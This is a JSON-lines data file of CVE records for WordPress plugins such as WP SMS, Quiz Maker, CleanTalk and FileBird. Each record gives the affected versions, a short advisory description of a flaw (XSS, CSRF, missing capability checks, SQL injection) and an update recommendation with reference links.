{"CVE_ID":"CVE-2024-24881","slug":"wp-sms","versionEndExcluding":"6.5.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP SMS \u2013 Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc allows Reflected XSS. This issue affects WP SMS \u2013 Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc: from n\/a through 6.5.2.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-sms\\\/wordpress-wp-sms-plugin-6-5-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-sms\\\/wordpress-wp-sms-plugin-6-5-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11466","slug":"dp-intro-tours","versionImpact":"6.5.2","versionEndExcluding":"6.5.3","description":"The Intro Tour Tutorial DeepPresentation plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 6.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 6.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dp-intro-tours\\\/tags\\\/6.5.2\\\/admin\\\/class-dp-intro-tours-admin-settings.php#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dp-intro-tours\\\/tags\\\/6.5.2\\\/admin\\\/class-dp-intro-tours-admin-settings.php#L125\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198780%40dp-intro-tours&new=3198780%40dp-intro-tours&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3198780%40dp-intro-tours&new=3198780%40dp-intro-tours&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fe082a7-3d36-48b4-b81f-1e65e5ea430d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1fe082a7-3d36-48b4-b81f-1e65e5ea430d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6883","slug":"easy-facebook-likebox","versionImpact":"6.5.2","versionEndExcluding":"6.5.3","description":"The Easy Social Feed plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on multiple AJAX functions in all versions up to, and including, 6.5.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform unauthorized actions, such as modifying the plugin's Facebook and Instagram access tokens and updating group IDs.","recommendation":"Update to version 6.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3deee9b5-2e36-447d-a492-e22e3dc6a5ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3deee9b5-2e36-447d-a492-e22e3dc6a5ab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012165\\\/easy-facebook-likebox\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3012165\\\/easy-facebook-likebox\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6109","slug":"yop-poll","versionImpact":"6.5.26","versionEndExcluding":"6.5.27","description":"The YOP Poll plugin for WordPress is vulnerable to a race condition in all versions up to, and including, 6.5.26. This is due to improper restrictions on the add() function. This makes it possible for unauthenticated attackers to place multiple votes on a single poll even when the poll is set to one vote per person.","recommendation":"Update to version 6.5.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/360b1927-a863-46be-ad11-3f6251c75a3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/360b1927-a863-46be-ad11-3f6251c75a3c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2959124\\\/yop-poll\\\/trunk\\\/admin\\\/models\\\/votes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2959124\\\/yop-poll\\\/trunk\\\/admin\\\/models\\\/votes.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1079","slug":"quiz-maker","versionImpact":"6.5.2.4","versionEndExcluding":"6.5.2.5","description":"The Quiz Maker plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ays_show_results() function in all versions up to, and including, 6.5.2.4. This makes it possible for unauthenticated attackers to fetch arbitrary quiz results which can contain PII.","recommendation":"Update to version 6.5.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602df370-cd5b-46dc-a653-6522aef0c62f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/602df370-cd5b-46dc-a653-6522aef0c62f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032035\\\/quiz-maker\\\/tags\\\/6.5.2.5\\\/admin\\\/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032035\\\/quiz-maker\\\/tags\\\/6.5.2.5\\\/admin\\\/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1078","slug":"quiz-maker","versionImpact":"6.5.2.4","versionEndExcluding":"6.5.2.5","description":"The Quiz Maker plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ays_quick_start() and add_question_rows() functions in all versions up to, and including, 6.5.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary quizzes.","recommendation":"Update to version 6.5.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ba2b270-5f02-4cd8-8a22-1723c3873d67?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ba2b270-5f02-4cd8-8a22-1723c3873d67?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032035\\\/quiz-maker\\\/tags\\\/6.5.2.5\\\/admin\\\/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3032035\\\/quiz-maker\\\/tags\\\/6.5.2.5\\\/admin\\\/class-quiz-maker-admin.php?old=3030468&old_path=quiz-maker%2Ftags%2F6.5.2.4%2Fadmin%2Fclass-quiz-maker-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5282","slug":"wp-travel-engine","versionImpact":"6.5.1","versionEndExcluding":"6.5.2","description":"The WP Travel Engine \u2013 Tour Booking Plugin \u2013 Tour Operator Software plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the delete_package() function in all versions up to, and including, 6.5.1. This makes it possible for unauthenticated attackers to delete arbitrary posts.","recommendation":"Update to version 6.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305447\\\/wp-travel-engine\\\/tags\\\/6.5.2\\\/includes\\\/classes\\\/Core\\\/Controllers\\\/RestAPI\\\/V2\\\/Trip.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305447\\\/wp-travel-engine\\\/tags\\\/6.5.2\\\/includes\\\/classes\\\/Core\\\/Controllers\\\/RestAPI\\\/V2\\\/Trip.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebc8d724-3936-42d8-8850-bc330c5221dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebc8d724-3936-42d8-8850-bc330c5221dc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5285","slug":"wp-affiliate-platform","versionImpact":"6.5.1","versionEndExcluding":"6.5.2","description":"The wp-affiliate-platform WordPress plugin before 6.5.2 does not have CSRF check in place when deleting affiliates, which could allow attackers to make a logged in user delete them via a CSRF attack","recommendation":"Update to version 6.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/792f3904-88bd-47d1-9049-afccdd74853a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/792f3904-88bd-47d1-9049-afccdd74853a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5287","slug":"wp-affiliate-platform","versionEndExcluding":"6.5.1","description":"The wp-affiliate-platform WordPress plugin before 6.5.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in user change them via a CSRF attack","recommendation":"Update to version 6.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4fd535c-a273-419d-9e2e-be1cbd822793\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4fd535c-a273-419d-9e2e-be1cbd822793\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5286","slug":"wp-affiliate-platform","versionEndExcluding":"6.5.1","description":"The wp-affiliate-platform WordPress plugin before 6.5.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 6.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0b3069c-59d3-41ea-9b48-f5a4cf9ca45f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0b3069c-59d3-41ea-9b48-f5a4cf9ca45f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5284","slug":"wp-affiliate-platform","versionEndExcluding":"6.5.1","description":"The wp-affiliate-platform WordPress plugin before 6.5.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"Update to version 6.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a601a267-e781-439f-9c76-b4c841e819e5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a601a267-e781-439f-9c76-b4c841e819e5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5283","slug":"wp-affiliate-platform","versionEndExcluding":"6.5.1","description":"The wp-affiliate-platform WordPress plugin before 6.5.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 6.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3e1adcd3-7c46-45e8-9e2b-2ede0d79c943\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3e1adcd3-7c46-45e8-9e2b-2ede0d79c943\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5282","slug":"wp-affiliate-platform","versionEndExcluding":"6.5.1","description":"The wp-affiliate-platform WordPress plugin before 6.5.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 6.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf3fb97e-12fa-4b37-b28b-1771ddb5ceb1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bf3fb97e-12fa-4b37-b28b-1771ddb5ceb1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5281","slug":"wp-affiliate-platform","versionEndExcluding":"6.5.1","description":"The wp-affiliate-platform WordPress plugin before 6.5.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 6.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c0bdb0f-a06a-47a8-9198-a2bf2678b8f1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c0bdb0f-a06a-47a8-9198-a2bf2678b8f1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5280","slug":"wp-affiliate-platform","versionImpact":"6.5.0","versionEndExcluding":"6.5.1","description":"The wp-affiliate-platform WordPress plugin before 6.5.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make non-logged in users execute an XSS payload via a CSRF attack","recommendation":"Update to version 6.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bbc214ba-4e97-4b3a-a21b-2931a9e36973\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bbc214ba-4e97-4b3a-a21b-2931a9e36973\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-22027","slug":"quiz-maker","versionEndExcluding":"6.5.0.6","description":"Improper input validation vulnerability in WordPress Quiz Maker Plugin prior to 6.5.0.6 allows a remote authenticated attacker to perform a Denial of Service (DoS) attack against external services.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-maker\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-maker\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN37326856\\\/\",\"name\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN37326856\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1669","slug":"wp-seopress","versionEndExcluding":"6.5.0.3","description":"The SEOPress WordPress plugin before 6.5.0.3 unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fb8791f5-2879-431e-9afc-06d5839e4b9d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fb8791f5-2879-431e-9afc-06d5839e4b9d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4520","slug":"uncanny-automator","versionImpact":"6.4.0.2","versionEndExcluding":"6.5.0","description":"The Uncanny Automator plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on multiple AJAX functions in versions up to, and including, 6.4.0.2. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update plugin settings.","recommendation":"Update to version 6.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uncanny-automator\\\/tags\\\/6.4.0.2\\\/src\\\/integrations\\\/keap\\\/helpers\\\/keap-helpers.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/uncanny-automator\\\/tags\\\/6.4.0.2\\\/src\\\/integrations\\\/keap\\\/helpers\\\/keap-helpers.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db5b5fa1-67b5-4103-93b0-682200199a71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db5b5fa1-67b5-4103-93b0-682200199a71?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9169","slug":"litespeed-cache","versionImpact":"6.4.1","versionEndExcluding":"6.5","description":"The LiteSpeed Cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin debug settings in all versions up to, and including, 6.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/051a987a-944a-4898-872b-0456f0f59b27?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/051a987a-944a-4898-872b-0456f0f59b27?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.litespeedtech.com\\\/products\\\/cache-plugins\\\/wordpress-acceleration\",\"name\":\"https:\\\/\\\/www.litespeedtech.com\\\/products\\\/cache-plugins\\\/wordpress-acceleration\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4939","slug":"weaverx-theme-support","versionImpact":"6.4","versionEndExcluding":"6.5","description":"The Weaver Xtreme Theme Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's div shortcode in all versions up to, and including, 6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc121ed0-4cb3-4ba4-b693-413b1c25e4ca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc121ed0-4cb3-4ba4-b693-413b1c25e4ca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3095286%40weaverx-theme-support%2Ftrunk&old=3017943%40weaverx-theme-support%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3095286%40weaverx-theme-support%2Ftrunk&old=3017943%40weaverx-theme-support%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4656","slug":"wp-stats-manager","versionEndExcluding":"6.5","description":"The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 6.5 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05976ed8-5a26-4eae-adb2-0ea3b2722391\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05976ed8-5a26-4eae-adb2-0ea3b2722391\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10781","slug":"cleantalk-spam-protect","versionImpact":"6.44","versionEndExcluding":"6.45","description":"The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to a missing empty value check on the 'api_key' value in the 'perform' function in all versions up to, and including, 6.44. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.","recommendation":"Update to version 6.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cleantalk-spam-protect\\\/tags\\\/6.44\\\/lib\\\/Cleantalk\\\/ApbctWP\\\/RemoteCalls.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cleantalk-spam-protect\\\/tags\\\/6.44\\\/lib\\\/Cleantalk\\\/ApbctWP\\\/RemoteCalls.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cleantalk-spam-protect\\\/tags\\\/6.44\\\/lib\\\/Cleantalk\\\/ApbctWP\\\/RemoteCalls.php#L96\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cleantalk-spam-protect\\\/tags\\\/6.44\\\/lib\\\/Cleantalk\\\/ApbctWP\\\/RemoteCalls.php#L96\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188546\\\/cleantalk-spam-protect#file653\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188546\\\/cleantalk-spam-protect#file653\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79ae062c-b084-4045-9407-2d94919993af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79ae062c-b084-4045-9407-2d94919993af?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10542","slug":"cleantalk-spam-protect","versionImpact":"6.43.2","versionEndExcluding":"6.44","description":"The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function in all versions up to, and including, 6.43.2. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.","recommendation":"Update to version 6.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cleantalk-spam-protect\\\/tags\\\/6.43.2\\\/lib\\\/Cleantalk\\\/ApbctWP\\\/RemoteCalls.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cleantalk-spam-protect\\\/tags\\\/6.43.2\\\/lib\\\/Cleantalk\\\/ApbctWP\\\/RemoteCalls.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179819\\\/cleantalk-spam-protect#file631\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179819\\\/cleantalk-spam-protect#file631\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7eb5fad-bb62-4f0b-ad52-b16c3e442b62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7eb5fad-bb62-4f0b-ad52-b16c3e442b62?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6166","slug":"quiz-maker","versionImpact":"6.4.9.4","versionEndExcluding":"6.4.9.5","description":"The Quiz Maker WordPress plugin before 6.4.9.5 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting","recommendation":"Update to version 6.4.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e6155d9b-f6bb-4607-ad64-1976a8afe907\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e6155d9b-f6bb-4607-ad64-1976a8afe907\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6155","slug":"quiz-maker","versionImpact":"6.4.9.4","versionEndExcluding":"6.4.9.5","description":"The Quiz Maker WordPress plugin before 6.4.9.5 does not adequately authorize the `ays_quiz_author_user_search` AJAX action, allowing an unauthenticated attacker to perform a search for users of the system, ultimately leaking user email addresses.","recommendation":"Update to version 6.4.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c62be802-e91a-4bcf-990d-8fd8ef7c9a28\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c62be802-e91a-4bcf-990d-8fd8ef7c9a28\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6986","slug":"filebird","versionImpact":"6.4.8","versionEndExcluding":"6.4.9","description":"The FileBird \u2013 WordPress Media Library Folders & File Manager plugin for WordPress is vulnerable to SQL Injection via the 'search' parameter in all versions up to, and including, 6.4.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Author-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 6.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filebird\\\/trunk\\\/includes\\\/Controller\\\/FolderController.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filebird\\\/trunk\\\/includes\\\/Controller\\\/FolderController.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3338922%40filebird&new=3338922%40filebird&sfp_email=&sfph_mail=#file11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3338922%40filebird&new=3338922%40filebird&sfp_email=&sfph_mail=#file11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce70da8e-7273-4eca-b187-2db7c36f1a50?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce70da8e-7273-4eca-b187-2db7c36f1a50?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5889","slug":"events-manager","versionImpact":"6.4.8","versionEndExcluding":"6.4.9","description":"The Events Manager \u2013 Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018country\u2019 parameter in all versions up to, and including, 6.4.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 6.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73cbb65e-b4e3-4374-9916-9a3d1be5a014?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/73cbb65e-b4e3-4374-9916-9a3d1be5a014?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106809\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3106809\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10356","slug":"element-ready-lite","versionImpact":"6.4.8","versionEndExcluding":"6.4.9","description":"The ElementsReady Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.8 in inc\/Widgets\/accordion\/output\/content.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 6.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204333\\\/element-ready-lite\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204333\\\/element-ready-lite\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0a48c91-7e2c-4708-b5af-dfbcfea08f83?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b0a48c91-7e2c-4708-b5af-dfbcfea08f83?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
